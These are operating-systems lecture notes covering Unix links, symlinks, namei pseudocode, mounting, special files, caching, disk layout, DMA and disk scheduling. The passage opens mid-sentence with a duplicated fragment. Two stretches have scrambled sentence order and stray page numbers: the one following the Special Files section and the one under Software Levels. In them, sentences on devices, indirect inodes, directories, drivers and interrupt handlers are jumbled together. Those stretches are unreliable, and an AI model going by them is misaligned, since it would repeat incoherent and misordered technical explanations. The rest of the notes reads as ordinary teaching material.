entry. namei is called with current == 1. but you can't use the inumber when talking to the Unix kernel.

Finally, the new name is added to its directory:

    addDirectoryEntry(inode[dir], target, "f");

If, for example, /a/b/c resolves to inumber 123, the entry (123, "f") is added to the directory file designated by "/d/e". The result is that both "/a/b/c" and "/d/e/f" resolve to the same file (the one with inumber 123). Since all aliases are equal, there's no one "true name" for a file. You can find out whether two path names designate the same file by comparing inumbers: there is a system call to get the meta-data about a file, and the inumber is included in that information. You can learn the inumber of a file if you like, but you can't use the inumber when talking to the Unix kernel; files are always specified in Unix system calls by a character-string path name.

Although this algorithm provides the ability to create aliases for files in a simple and secure manner, it has several flaws:

• It's hard to figure out how to charge users for disk space. Ownership is associated with the file, not the directory entry (the owner's id is stored in the inode). If I create a file and you make a link to it, I will continue to be charged for its space even if I try to remove it through my original name for it. Worse still, you could make it much bigger after I have no access to it.

• A file cannot be deleted without finding all the links to it and deleting them. Your link may be in a directory I don't have access to, so I may be unable to delete the file, even though I'm being charged for its space.

• Even if you remember the path name used to get to the file, that is not a reliable "handle" to the file (for example, for linking two files together by storing the name of one in the other). One of the components of the path name could be removed, thus invalidating the name, even though the file still exists under a different name.

We have seen that a file can have more than one name. What happens if it has no names (does not appear in any directory)? Since the only way to name a file in a system call is by a path name, such a file would be useless. It would consume resources (the inode and probably some data and indirect blocks) but there would be no way to read it, write to it, or even delete it. There is no system call to delete a file, only the system call unlink(name), which removes the directory entry corresponding to name. Unix protects against this "garbage collection" problem by using reference counts. Each inode contains a count of the number of directory entries that point to it. System calls that add or remove directory entries (creat, link, mkdir, rmdir, etc.) update these reference counts appropriately. If the reference count of an inode drops to zero, the system automatically deletes the file and returns all of its blocks to the free list.
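In the same style as the code above, unlink might be sketched like this. The helpers dirname, basename, removeDirectoryEntry, freeBlocks, and freeInode are hypothetical, and the sketch ignores the real system's extra rule that an open file is not freed until it is closed:

    void unlink(String name) {
        int dir = namei(1, parse(dirname(name)));     // directory containing the entry
        int target = namei(1, parse(name));           // the file itself
        removeDirectoryEntry(inode[dir], basename(name));
        inode[target].linkCount--;                    // one fewer name for this inode
        if (inode[target].linkCount == 0) {
            freeBlocks(inode[target]);   // return data and indirect blocks to the free list
            freeInode(target);           // mark the inode itself unused
        }
    }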
We saw before that the reference counting algorithm for garbage collection has a fatal flaw: If there are cycles, reference counting will fail to collect some garbage. Unix avoids this problem by making sure cycles cannot happen. The system calls are designed so that the set of directories will always be a single tree rooted at inode 1: mkdir creates a new directory, empty except for the . and .. entries, as a leaf of the tree; rmdir is only allowed to delete a directory that is empty (except for the . and .. entries); and link is not allowed to link to a directory. "User" programs are not allowed to update directories directly, so there is no way to make an alias for a directory. Because links to directories are not allowed, the only place the file system is not a tree is at the leaves (regular files), and that cannot introduce cycles.

Directories do have unique names, because the directories form a tree, and one of the properties of a tree is that there is a unique path from the root to any node. So while it's not possible to find the name (or any name) of an arbitrary file, it is possible to figure out the name of a directory. The "." and ".." entries in each directory make this possible. Here, for example, is code to find the name of the current working directory:

    class DirectoryEntry {
        int inumber;
        String name;
    }

    String cwd() {
        FileInputStream thisDir = new FileInputStream(".");
        int thisInumber = nameToInumber(thisDir, ".");
        return getPath(".", thisInumber);
    }

    String getPath(String currentName, int currentInumber) {
        String parentName = currentName + "/..";
        FileInputStream parent = new FileInputStream(parentName);
        int parentInumber = nameToInumber(parent, ".");
        String fname = inumberToName(parent, currentInumber);
        if (parentInumber == 1)
            return "/" + fname;
        else
            return getPath(parentName, parentInumber) + "/" + fname;
    }

The procedure nameToInumber is similar to the procedure with the same name described above, but takes an InputStream as an argument rather than an inode. The procedure inumberToName is similar, but searches for an entry containing a particular inumber and returns the name field of the entry. Many versions of Unix allow a program to open a directory for reading and read its contents just like any other file, so it would be easy to write nameToInumber as a user-level procedure if you know the format of a directory.

Symbolic Links

To get around the limitations of the original Unix notion of links, more recent versions of Unix introduced the notion of a symbolic link (to avoid confusion, the original kind of link, described in the previous section, is sometimes called a hard link). A symbolic link is a new type of file, distinguished by a code in the inode from directories, regular files, etc. When the namei procedure that translates path names to inumbers encounters a symlink, it treats the contents of the file as a path name and uses it to continue the translation.

If the contents of the file is a relative path name (it does not start with a slash), it is interpreted relative to the directory containing the link itself, not the current working directory of the process doing the lookup. The expanded code looks like this:

    int namei(int current, String[] path) {
        for (int i = 0; i < path.length; i++) {
            if (inode[current].type != DIRECTORY)
                throw new Exception("not a directory");
            int parent = current;
            current = nameToInumber(inode[current], path[i]);
            if (current == 0)
                throw new Exception("no such file or directory");
            while (inode[current].type == SYMLINK) {
                String link = getContents(inode[current]);
                String[] linkPath = parse(link);
                if (link.charAt(0) == '/')
                    current = namei(1, linkPath);
                else
                    current = namei(parent, linkPath);
                if (current == 0)
                    throw new Exception("no such file or directory");
            }
        }
        return current;
    }

The only change from the previous version of this procedure is the addition of the while loop. Any time the procedure encounters a node of type SYMLINK, it recursively calls itself to translate the contents of the file, interpreted as a path name, into an inumber. Although the implementation looks complicated, it does just what you would expect in normal situations. For example, suppose there is an existing file named /a/b/c and an existing directory /d. Then the command

    ln -s /a/b /d/e

makes the path name /d/e a synonym for /a/b, and also makes /d/e/c a synonym for /a/b/c. From the user's point of view, the picture looks like this:

[Figure omitted: to the user, /d/e appears as simply another name for the subtree rooted at /a/b.]

In implementation terms, the picture looks like this:

[Figure omitted: a new node of type symlink, drawn as a hexagon, whose contents are the path name /a/b.]

Here's a more elaborate example that illustrates symlinks with relative path names. Suppose I have an existing directory /usr/solomon/cs537/s90 with various sub-directories and I am setting up project 5 for this semester. I might do something like this:

    cd /usr/solomon/cs537
    mkdir f96
    cd f96
    ln -s ../s90/proj5 proj5.old
    cat proj5.old/foo.c
    cd /usr/solomon/cs537
    cat f96/proj5.old/foo.c
    cat s90/proj5/foo.c

Logically, the situation looks like this:

[Figure omitted: the logical tree, in which f96/proj5.old appears as a subdirectory of f96.]

And physically, it looks like this:

[Figure omitted: the physical tree, in which proj5.old is a symlink node containing the relative path ../s90/proj5.]

All three of the cat commands refer to the same file.

The added flexibility of symlinks over hard links comes at the expense of less security. Symlinks are neither required nor guaranteed to point to valid files. You can remove a file out from under a symlink, and in fact you can create a symlink to a non-existent file. Symlinks can also have cycles, and in some cases symlinks can cause infinite loops or infinite recursion in the namei procedure. The real version in Unix puts a limit on how many times it will iterate and returns an error code of "too many links" if the limit is exceeded. For example, this works fine:

    cd /usr/solomon
    mkdir bar
    ln -s /usr/solomon foo
    ls /usr/solomon/foo/foo/foo/foo/bar

However, symlinks to directories can also cause the "change directory" command cd to behave in strange ways. Most people expect the two commands

    cd foo
    cd ..

to cancel each other out. With symlinks, they may not. For example, after the commands above, the commands

    cd /usr/solomon
    cd foo
    cd ..

would leave you in the directory /usr, since foo is an alias for /usr/solomon itself. Some shell programs treat cd specially and remember what alias you used to get to the current directory. In the last example, after cd /usr/solomon, cd foo, and cd foo again, such a shell considers the current directory to be /usr/solomon/foo/foo, and the command cd .. is treated as if you had typed cd /usr/solomon/foo.

Mounting

What if your computer has more than one disk? In many operating systems (including DOS and its descendants) a path name starts with a device name, as in C:\usr\solomon (by convention, C is the name of the default hard disk). If you leave the device prefix off a path name, the system supplies a default current device similar to the current directory. Unix allows you to glue together the directory trees of multiple disks to create a single unified tree. There is a system call

    mount(device, mount_point)

where device names a particular disk drive and mount_point is the path name of an existing node in the current directory tree (normally an empty directory). The result is similar to a hard link: The mount point becomes an alias for the root directory of the indicated disk. Here's how it works: The kernel maintains a table of existing mounts represented as (device1, inumber, device2) triples. During namei, whenever the current (device, inumber) pair matches the first two fields in one of the entries, the current device and inumber become device2 and 1, respectively. Here's the expanded code:

    int namei(int curi, int curdev, String[] path) {
        for (int i = 0; i < path.length; i++) {
            if (disk[curdev].inode[curi].type != DIRECTORY)
                throw new Exception("not a directory");
            int parent = curi;
            curi = nameToInumber(disk[curdev].inode[curi], path[i]);
            if (curi == 0)
                throw new Exception("no such file or directory");
            while (disk[curdev].inode[curi].type == SYMLINK) {
                String link = getContents(disk[curdev].inode[curi]);
                String[] linkPath = parse(link);
                if (link.charAt(0) == '/')
                    curi = namei(1, rootdev, linkPath);
                else
                    curi = namei(parent, curdev, linkPath);
                if (curi == 0)
                    throw new Exception("no such file or directory");
            }
            int newdev = mountLookup(curdev, curi);
            if (newdev != -1) {
                curdev = newdev;
                curi = 1;
            }
        }
        return curi;
    }

In this code, we assume that mountLookup searches the mount table for a matching entry, returning -1 if no matching entry is found, and that rootdev is the device holding the root of the unified tree.
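A minimal representation of the mount table and the mountLookup procedure assumed above might look like this (a sketch; the field names are invented):

    class MountEntry {
        int dev1;      // device containing the mount point
        int inumber;   // inumber of the mount point on dev1
        int dev2;      // device whose root directory replaces it
    }

    MountEntry[] mounts;   // filled in by the mount system call

    int mountLookup(int dev, int inumber) {
        for (MountEntry m : mounts)
            if (m.dev1 == dev && m.inumber == inumber)
                return m.dev2;
        return -1;   // no mount at this (device, inumber) pair
    }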

There is also a special case (not shown here) for "..", so that the ".." entry in the root directory of a mounted disk behaves like a pointer to the parent directory of the mount point.

The Network File System (NFS) from Sun Microsystems extends this idea to allow you to mount a disk from a remote computer. The device argument to the mount system call names the remote computer as well as the disk drive, and both pieces of information are put into the mount table. Now there are three pieces of information to define the "current directory": the inumber, the device, and the computer. If the current computer is remote, all operations (read, write, creat, delete, mkdir, rmdir, etc.) are sent as messages to the remote computer. Information about remote open files, including a seek pointer and the identity of the remote machine, is kept locally. Each read or write operation is converted locally to one or more requests to read or write blocks of the remote file. NFS caches blocks of remote files locally to improve performance.

Special Files

I said that the Unix mount system call has the name of a disk device as an argument. How do you name a device? The answer is that devices appear in the directory tree as special files. An inode whose type is "special" (as opposed to "directory," "symlink," or "regular") represents some sort of I/O device. Instead of containing pointers to disk blocks, the inode of a special file contains information (in a machine-dependent format) about the device. It is customary to put special files in the directory /dev, but since it is the inode that is marked "special," they can be anywhere. The operating system tries to make the device look as much like a file as possible, so that ordinary programs can open, close, read, or write the device just like a file.

such as a mouse. or write the device just like a file. Some devices look more like real file than others. it is starting to show up more and more in other operating systems. The second to pointers to pointers to sectors (a double indirect node) and the third to pointers to pointers to sectors (triple indirect). etc. This results in increasing access times for blocks later in the file. the corresponding process is killed. The first points to inode structures that contain only pointers to sectors. it makes virtual memory look like a device.tries to make the device look as much like a file as possible. are write-only. You can read these files to get information about the states of processes. The seek operation on a device like /dev/tty updates the seek pointer. there are multiple terminal devices with names like /dev/tty0. If attributes are stored directly in the directory node. Other devices. the permissions for the raw disk devices are highly restrictive. If you delete one of these files. Node Direct Inode Indirect Inodes The last 3 sector pointers are special. In a sense. The special file /dev/tty represents the terminal. Large files will have longer access times to the end of the file. Some versions have a directory with one special file for each active process. Some versions of Unix make network connections look like files. On machines with more than one terminal. I-nodes specifically optimize for short files. even if more is requested. This choice bears directly on the implementation of linking. A disk device looks exactly like a file. but a read will return only the next physical block of data on the device. Some devices. This idea of making all sorts of things look like files can be very powerful. Directories Directories are generally simply files with a special interpretation. close. Although this idea was pioneered by Unix. /dev/tty1. (New EPA rules require that this data be recycled. but the seek pointer has no effect on reads or writes. Write operations on such devices have no effect. which is an image of the memory space of the current process. so that ordinary programs can open.) One particularly interesting device is /dev/mem. Another idea is to have a directory with one special file for each print job waiting to be printed. It is now used to generate federal regulations and other meaningless documents. Writes to /dev/tty display characters on the screen. Reads of /dev/tty are also different from reads of a file in that they may return fewer bytes than requested: Normally. There is special file called /dev/null that does nothing at all: reads return end-of-file and writes send their data to the garbage bin. this device is the exact opposite of memory-mapped files. this is an indirect block. (hard) linking is difficult because changes to the file must be mirrored in all 194 . Attempts to read from them give an end-of-file indication (a return value of zero). A read call will block the caller until at least one character can be returned. For obvious security reasons. Some directory structures contain the name of a file. the next read will get the remaining bytes. If the number of bytes requested is less than the length of the line. its attributes and a pointer3 either into its FAT list or to its i-node. Reads from /dev/tty return characters typed on the keyboard. Reads return whatever is on the disk and writes can scribble anywhere on the disk. read. are read-only. A tape drive looks sort of like a disk. a read will return characters only up through the next end-of-line. 
Directories

Directories are generally simply files with a special interpretation. Some directory structures contain the name of a file, its attributes, and a pointer3 either into its FAT list or to its i-node. This choice bears directly on the implementation of linking. If attributes are stored directly in the directory entry, (hard) linking is difficult, because changes to the file must be mirrored in all the directories that name it. If the directory entry simply points to a structure (like an i-node) that holds the attributes internally, only that structure needs to be updated.

3 It's usually a sector number, but thinking of it as a pointer is closer to its function.
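A sketch of the two entry layouts makes the tradeoff plain. Both classes are invented for illustration; the point is only where the attributes live.

    // Design 1 (FAT-style): attributes live in the directory entry itself.
    // A hard link would require every entry naming the file to be updated
    // whenever the size or permissions change.
    class FlatDirEntry {
        String name;
        int size, permissions;   // attributes stored in the entry
        int firstBlock;          // pointer into the FAT chain
    }

    // Design 2 (Unix-style): the entry is just a (name, i-number) pair.
    // Several entries in different directories may carry the same i-number;
    // the attributes are stored once, in the i-node.
    class UnixDirEntry {
        String name;
        int inumber;             // "pointer" to the i-node (really an index)
    }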

File System Implementation - Performance

This lecture discusses the details of making the file system perform well. This is primarily done with two mechanisms: caching and file layout.

Multiple Disks

There are two approaches to having multiple disks on a system (where disks are really devices that export a file system interface): the disks can be explicit or implicit. An example of explicit disk naming is MS-DOS's A:\SYS\FILE.TXT; other systems from IBM VM/CMS to Amiga DOS have done the same thing. Making disks explicit makes the boundaries between physical devices clear. UNIX® clouds the issue by allowing one device to be grafted onto the name space established by another at a mount point. A mount point looks like a directory to the user, but to the operating system it marks the boundary between devices. As a result, the file system appears to be one seamless name space, but there are subsets of the space on different devices.

Caching

Far and away the most effective strategy for improving file system performance is caching. Many files are referenced often. Consider executables for commonly executed utilities, or directories: every time a file is opened or created, the OS must access all the directories on the path from the root to the file itself. Accesses to the physical disk for these common cases can be avoided if the blocks that would have been read from the disk are cached in memory rather than being read from disk each time.

Cached Blocks

Caching is accomplished by setting aside a portion of memory and using it to store blocks as they are brought into memory. Blocks are read or written in memory if possible, and written out to disk when convenient or when the block must be removed from the cache to make way for a new block. The important issue with any caching system is the tradeoff between performance and consistency of the caching system - in this case, the difference between the versions of file blocks that are in the cache and on the disk. For reads this distinction isn't terribly interesting: during operation, processes always read from the file cache first and go to the disk only if the block is not cached. The issue is how writes are cached. The consistency problem arises when the computer catastrophically fails - for example, a power outage when all the file cache blocks haven't been written out to disk. When the OS restarts, the file system may be in an inconsistent state.

There are several models of consistency that can be used, each of which marks a point on the consistency/performance curve:

• The slowest and most reliable choice is to write all data synchronously to disk. This is the choice made by MS-DOS and Windows (for floppies, anyway).
• The BSD FFS systems take a more conservative approach than Linux, but not the most conservative one. They write metadata synchronously to disk - that is, any changes to the file system structures themselves are not cached. (File system structures include the free block list and file allocations.) Thus it's possible to lose modifications to allocated blocks in a file, but not to have a block appear once on the free list and once on a file's allocation list.
• The Linux EXT2FS file system makes no special concessions to consistency. Its goal is a blazingly fast UNIX® file system, and it's willing to risk the dangers of file system corruption if operation is interrupted at an inopportune moment.
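Here is a minimal sketch of such a block cache, assuming an LRU eviction policy and a writeThrough flag that models the synchronous end of the consistency curve. The class and its disk stubs are invented for illustration.

    import java.util.LinkedHashMap;
    import java.util.Map;

    class BlockCache {
        static final int CAPACITY = 1024;          // blocks kept in memory
        final boolean writeThrough;                // true = write synchronously

        static class Block { byte[] data; boolean dirty; }

        // An access-ordered LinkedHashMap gives LRU eviction for free.
        final LinkedHashMap<Integer, Block> cache =
            new LinkedHashMap<Integer, Block>(CAPACITY, 0.75f, true) {
                protected boolean removeEldestEntry(Map.Entry<Integer, Block> e) {
                    if (size() <= CAPACITY) return false;
                    if (e.getValue().dirty)            // write back on eviction
                        writeToDisk(e.getKey(), e.getValue().data);
                    return true;
                }
            };

        BlockCache(boolean writeThrough) { this.writeThrough = writeThrough; }

        byte[] read(int block) {                   // always try the cache first
            Block b = cache.get(block);
            if (b == null) {
                b = new Block();
                b.data = readFromDisk(block);
                cache.put(block, b);
            }
            return b.data;
        }

        void write(int block, byte[] data) {
            Block b = new Block();
            b.data = data;
            b.dirty = !writeThrough;               // dirty only if the write is delayed
            cache.put(block, b);
            if (writeThrough) writeToDisk(block, data);
        }

        static byte[] readFromDisk(int n) { return new byte[4096]; }   // stub
        static void writeToDisk(int n, byte[] d) { /* stub */ }
    }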

The consistency issue underscores the difference between file cache management and virtual memory management algorithms. In paging, all pages are transient and therefore equally important. In the file system, some blocks contain data that is essential to the continued correct operation of the file system1 and must be treated specially. Modulo these differences, paging algorithms are a good fit for managing the file cache. In general a variant of LRU is usually used, with the modifications appropriate for the level of consistency required. In fact, some systems, like FreeBSD and Solaris, use only one cache for both virtual memory pages and cached file blocks. This allows the number of pages or file blocks to grow as needed.

1 Not only are these blocks essential for correct FS operation, sometimes the information in the blocks is interrelated. The easiest example is that a block being removed from the free list and added to a file depends on at least two blocks being consistently updated.

File System Checking

Most systems have a mechanism for checking the file system integrity, even if they take great pains to maintain that integrity. Occasional bad blocks or software bugs may corrupt data, and it's worthwhile to periodically check the file systems to reduce the impact of any damage. The less consistency the operating system enforces, the more frequently the file system should be checked.

The checking process is basically:

• Compare the free list to the list of allocations for all the files. Each block should appear exactly once. Blocks appearing on both the free list and one file can (probably) be allocated to the file. Blocks not appearing at all should be considered free. Blocks allocated to two or more files are a complicated case that probably requires human intervention.
• Check all directories for pointers to the files. If files exist that have no directory entries, delete them and reclaim their allocations. (This situation can be caused by a system like UNIX® that allows open files to remain on the disk while a process has them open.)
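Below is a sketch of the first pass, assuming the file system can enumerate its free list and per-file allocation lists; the interfaces are invented, and the repairs are only reported, not applied.

    import java.util.List;

    class FsCheck {
        // freeList and fileBlocks are assumed inputs: the free list, and the
        // block list of every file, for a disk of nblocks blocks.
        static void check(int nblocks, List<Integer> freeList,
                          List<List<Integer>> fileBlocks) {
            int[] inFree = new int[nblocks];
            int[] inFile = new int[nblocks];
            for (int b : freeList) inFree[b]++;
            for (List<Integer> f : fileBlocks)
                for (int b : f) inFile[b]++;

            for (int b = 0; b < nblocks; b++) {
                if (inFree[b] + inFile[b] == 0)
                    System.out.println(b + ": missing; add to free list");
                else if (inFree[b] > 0 && inFile[b] == 1)
                    System.out.println(b + ": free and allocated; give to the file");
                else if (inFile[b] > 1)
                    System.out.println(b + ": in " + inFile[b]
                            + " files; needs human intervention");
                else if (inFree[b] > 1)
                    System.out.println(b + ": duplicated on free list");
            }
        }
    }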

Disk Layout

Avoiding disk seeks is the most fruitful optimization to a file system after caching2. When seeks are expensive, try to place related data physically close together on the disk. One source of seeks is seeking from i-nodes allocated on one end of the disk to data blocks on the other, or seeking from a directory entry to a data block. In the original Berkeley UNIX file system, i-nodes were allocated at the beginning of the disk and data blocks everywhere else. The Berkeley fast file system disperses i-nodes throughout the disk, and does its best to place data sectors near the i-node that owns the file, to reduce seek times. Although that example is UNIX®-specific, the concept covers many operating systems.

[Figure: i-node placement in the old file system versus the fast file system]

A related issue is reducing rotational latency. Files are usually read sequentially, but laying file blocks out contiguously on the disk can incur additional rotational delays. The problem is that after the first block is read and returned, the OS issues a request for the next block; by then the disk has partially rotated past the disk head. It's even a little worse than this: the disk must now wait one rotation time until the beginning of the desired sector appears again. By interleaving file blocks, the time to return the block and get the next request can be spent spinning over an unneeded block.

2 Assuming that seeks are expensive in the file system. That's true of disks, CDs, tapes, etc., but not of memory. A memory file system can avoid these issues.

The I/O Subsystem

The I/O subsystem is concerned with the work of providing the virtual interface to the hardware, converting from the OS's logical view to the messy realities of the hardware. This is the code that has to deal with the idiosyncrasies of devices. Events on disk drives occur without any regard for the state of the CPU, and the CPU must deal with that.

Devices or controllers are frequently controlled by accessing device registers, which pass parameters from CPU to device (or controller). Such device registers are either accessible through special I/O instructions or by memory mapping the device registers into the processor's address space. In practice, devices are not directly connected to the bus, but are managed by controllers. This allows multiple devices to share a single bus slot, and bus slots may be a scarce resource. Device controllers are also a frequent location for additional intelligence.

The Operating System is also responsible for coordinating the interrupts generated by the devices (and controllers). Generally a priority ordering is used: some devices can have their handlers interrupted by higher priority devices. Depending on the services offered by the hardware, this may result in interrupts being delayed or even lost. If a system blocks rather than delaying interrupts, the system must poll device state when a high-priority interrupt returns, in case a low-priority interrupt has been lost.

Direct Memory Access (DMA)

In simple systems, the CPU must move each data byte to or from the bus using a LOAD or STORE instruction, as if the data were being moved to memory. This quickly uses up much of the CPU's computational power. In order to allow systems to support high I/O utilization while the CPU is getting useful work done on the users' behalf, devices are allowed to directly access memory. This direct access of memory by devices (or controllers) is called Direct Memory Access, commonly abbreviated DMA. Once a transfer has been set up, the CPU has no further involvement until the transfer is complete; typically DMA devices will issue interrupts on I/O completion. The CPU is still responsible for scheduling the memory accesses made by DMA devices.
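The difference is easy to see in a sketch of programmed I/O versus DMA for a hypothetical memory-mapped controller. The register numbers and the stubbed register accessors are invented; real hardware differs in detail.

    class DiskController {
        static final int DATA = 0, STATUS = 1, DMA_ADDR = 2, DMA_COUNT = 3,
                         DMA_CMD = 4, READY = 0x1, START_READ = 0x1;

        // Stubs standing in for LOADs/STOREs to memory-mapped registers.
        static int readRegister(int r) { return READY; }
        static void writeRegister(int r, long v) { }

        // Programmed I/O: the CPU moves every byte itself.
        static void programmedRead(byte[] buf) {
            for (int i = 0; i < buf.length; i++) {
                while ((readRegister(STATUS) & READY) == 0)
                    ;                                 // spin until a byte is ready
                buf[i] = (byte) readRegister(DATA);   // one LOAD per byte
            }
        }

        // DMA: program the controller, then let it move the data; an
        // interrupt announces completion while the CPU does other work.
        static void dmaRead(long physAddr, int count) {
            writeRegister(DMA_ADDR, physAddr);   // physical address (page pinned)
            writeRegister(DMA_COUNT, count);
            writeRegister(DMA_CMD, START_READ);
        }
    }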

DMA devices often confuse or are confused by virtual memory. Because this memory is being accessed by the device and not manipulated by the CPU, the addresses may not pass through an MMU; it is important to remember that the address space involved is that of the processor itself, not a user process. The OS must guarantee that memory intended for use by a DMA device is not manipulated by the paging system while the I/O is being performed; such pages are usually frozen (or pinned) to avoid changes.

In some sense DMA is simply an intermediate step to general purpose programmability on devices and device controllers. Several such smart controllers exist, with features ranging from bit swapping, checksum calculations, and encryption and compression, to digital signal processing and general purpose processors. Dealing with that programmability requires synchronization and care. Moreover, writing an interface to such smart peripherals is often a delicate balancing act between making features available and making the device unrecognizable.

I/O Software

The I/O software of the OS has several goals:

• Device Independence: All peripherals performing the same function should have the same interface, in order for code to be portable. All network adapters should accept packets; all disks should present logical blocks. In practice this is mitigated by the need to expose some features of the hardware.
• Uniform Naming: The OS needs to have a way to describe the various devices in the system so that it can administer them. Systems also have to deal with devices joining or leaving the name space (PCMCIA cards). Again, the naming system should be as flexible as possible.
• Error Handling: Devices can often deal with errors without user input - retrying a disk read or something similar. Although hiding errors can be good at some level, at other levels they should be seen: users must be able to tell that their disks are slowly failing. Fatal errors need to be communicated to the user in an understandable manner as well.
• Synchrony and Asynchrony: The I/O system needs to deal with the fact that external devices are not synchronized with the internal clock of the CPU. The I/O system code is what turns the asynchronous interrupts into system events that can be handled by the CPU.
• Device Sharing: Most devices are shared at some granularity by processes on a general purpose computer. It's the I/O system's job to make sure that sharing is fair (for some fairness metric) and efficient. The protection of devices should be managed consistently: for example, devices should all be accessible by capability, or all through the file system. User processes themselves are generally restricted from accessing devices directly, although such accesses may be allowed to improve performance at the cost of security and stability.

Software Levels

Interrupt Handlers

The Interrupt Service Routines (ISRs) are short routines designed to turn the asynchronous events from devices (and controllers) into synchronous ones that the operating system can deal with in time. ISRs generally encode the information about the interrupt into some queue that the OS checks regularly, e.g., on a context switch. While an ISR is executing, some set of interrupts is usually blocked, which is a dangerous state of affairs that should be avoided as much as possible - hence ISRs are kept short.
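A sketch of the usual structure, with invented names: the ISR does the minimum (grab the device status, queue an event) and the OS drains the queue at a convenient, synchronous time such as a context switch.

    import java.util.ArrayDeque;

    class InterruptEvents {
        static class Event { int device, status; }

        // The queue the ISR fills and the kernel drains; in a real kernel
        // this would be protected by disabling interrupts around access.
        static final ArrayDeque<Event> pending = new ArrayDeque<>();

        // Runs with some interrupts blocked: do as little as possible.
        static void isr(int device, int status) {
            Event e = new Event();
            e.device = device;
            e.status = status;
            pending.add(e);
        }

        // Called synchronously by the OS, e.g., on a context switch.
        static void drain() {
            Event e;
            while ((e = pending.poll()) != null)
                handle(e);                 // ordinary, interruptible kernel code
        }

        static void handle(Event e) { /* wake the waiting process, etc. */ }
    }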

e. The most common use of disks is for file systems. Each device is a different with different purposes. In addition to providing a uniform interface. Disk Drives: Disk drivers control one or more physical magnetic disks. multiplexing and demultiplexing data transfers. Conceptually. Print and open are easier to use than write and open.g. different implementations. for instance. because the file system overhead may depend strongly on the size of the OS’s logical blocks. logical ® physical mapping is just a matter of placing an ordering on the physical disk sectors that matches the logical disk sectors. Device Drivers: Device drivers are primarily responsible for issuing the low-level commands to the hardware that gets the hardware to do what the OS wants. ISRs generally encode the information about the interrupt into some queue that the OS checks regularly . It enforces protection. and measuring and reporting device performance. but it is the device driver that converts such logical addresses to real physical addresses and encodes them in a form that the hardware can understand. the uniform interface is sometimes pierced at this level to expose specific hardware features -. We will consider a representative sample of several kinds of device drivers and the specifics of how they work. This part of the OS provides consistent device naming and interfaces to the users. Also. some set of interrupts is usually blocked. much of them is hardware dependent. Device Independent OS Code: This is the part of the OS we’ve really been talking the most about. multiplexing requests and demultiplexing responses. and for error handling. Device drivers may also be responsible for programming smart controllers. databases and assorted other uses. but they are also used for swap space. on a context switch. which is pretty simple.in time. and does logical level caching and buffering. The OS may be coded in terms of logical block numbers for a file. Specifically such systems handle data formatting and buffering. User Code: Even the OS code is relatively rough and ready. Beyond that there are user level programs that specifically provide I/O services (daemons). Block Naming: In the simplest case. Good examples are the standard I/O library that provides a simplified interface to the file system. While an ISR is executing. Such programs spool data. or directly provide the services users require. letting them know what general errors occurred when the device driver couldn’t recover. Device Driver Specifics: We now consider some of the details of device drivers. The two may differ because multiple disks managed by the same OS may have different physical block sizes. The device drives is responsible for logical ® physical translations. The device independent code also provides a consistent error mode to users. and different worldviews.CD audio capabilities. raw backups. sometimes a logical block size much in excess of the disks sectors is chosen to 199 . Differences between logical and physical block sizes can confuse this. As a result. User libraries provide simpler interfaces to I/O systems. which is a dangerous state of affairs that should be avoided as much as possible. perhaps the most important facet of device drivers is the conversion from logical to physical addressing.

Multiplexing and Arm Scheduling

The first issue in multiplexing multiple requests is doing so efficiently. Efficiency in this case means returning data to the users as quickly as possible. Most of the latency in serving a disk request is in seek time - moving the disk arm over the proper track - and from the OS point of view, seek times can vary widely based on the applications making requests. Accordingly, scheduling the requests to minimize seek time is often handled by the device driver. Scheduling user disk requests is called arm scheduling, because the problem is essentially scheduling accesses by the disk arm. Some familiar algorithms appear, as well as some new ones; as with CPU scheduling, a compromise between optimization and fairness is needed.

There are other issues in multiplexing, mostly related to how intelligent the controller is. An intelligent controller may be able to handle several outstanding requests from the software. Of course, if the controller cannot multiplex, the simple arm scheduling below applies, in which case the device driver needs to do a little bookkeeping.

We will illustrate the scheduling algorithms by using them to order requests for the following tracks (in the order they were queued): 11, 1, 36, 16, 34, 9, 12.

• FIFO: The requests are served in the order they appear: 11, 1, 36, 16, 34, 9, 12. Without optimizing at all, this is easy to implement, but almost never used.
• Shortest Seek First (SSF): This is analogous to shortest job first: the request that requires moving the arm the least distance is served next. On our canonical input: 11, 12, 9, 16, 1, 34, 36. The problem with this algorithm is that it encourages access patterns that keep the disk head in one place; lone accesses to distant tracks suffer very long access times or, in the worst case, never get served at all.
• The Elevator Algorithm: The elevator algorithm tries to keep the disk arm moving in one direction, serving requests as it passes them. On our canonical input, with the head moving toward higher tracks, the access pattern is 11, 12, 16, 34, 36, 9, 1. In practice the elevator algorithm strikes a good balance between efficiency and fairness.
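Here is a sketch of the elevator algorithm applied to that queue. The implementation choices (a sorted set, a boolean direction, the head starting at the first request) are illustrative, not the only reasonable ones.

    import java.util.TreeSet;

    class Elevator {
        public static void main(String[] args) {
            int[] queued = {11, 1, 36, 16, 34, 9, 12};
            TreeSet<Integer> pending = new TreeSet<>();
            for (int t : queued) pending.add(t);

            int head = 11;          // assume the head starts at the first request
            boolean up = true;      // moving toward higher-numbered tracks

            while (!pending.isEmpty()) {
                // Next request at or beyond the head in the current direction.
                Integer next = up ? pending.ceiling(head) : pending.floor(head);
                if (next == null) {        // nothing further this way: reverse
                    up = !up;
                    continue;
                }
                System.out.print(next + " ");   // prints: 11 12 16 34 36 9 1
                pending.remove(next);
                head = next;
            }
        }
    }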

Error Handling

The disk device driver is the first element of the OS to see an error, and it has to adopt some strategy for which errors to try to correct and which to report. There are a variety of things that can go wrong in a disk, and Tanenbaum discusses quite a few. Some of them are not reproducible. In most cases, the appropriate response to the error is to reset some confused part of the hardware and retry the operation. Errors that are resolved by this are transient errors; in most cases, transient errors can be ignored, and will never bother the system again. Some errors, however, are predictors of future woe: when a sector shows a sharp increase in checksum errors, it's likely that the sector or the disk itself is wearing out, and a human being or a higher level of the operating system may want to check into the matter further. Good device drivers try to strike a balance between reporting too many and reporting too few errors.

Error handling may also interfere with a straightforward logical-to-physical mapping. Some smart disk systems leave a few blocks unassigned when the disk is formatted, for use when other blocks go bad. When a bad block is detected, the data is moved from the bad block to one of the set-aside blocks, and the logical-to-physical mapping is changed so that the logical block maps to the set-aside block rather than the bad block. This transparently repairs bad blocks. Originally, such block-shuffling shenanigans were all done in the software, but as disk controllers (and drives) get smarter, these remappings are often done in the hardware.

Faster, Smarter, Bigger, More

Hardware is getting smarter: disk drives and controllers are getting smarter by the revision, and functionality that was traditionally in the drivers is now being moved to controllers and disk firmware. As a result, device drivers are less concerned with directly manipulating the devices than with programming the controllers to do so. Some important functionalities that have begun to appear in disk hardware:

• Interleaving. Many disks today encode the block layout as the interleaving of sectors on the disk. The disk firmware renumbers the sectors rather than the OS doing layout.
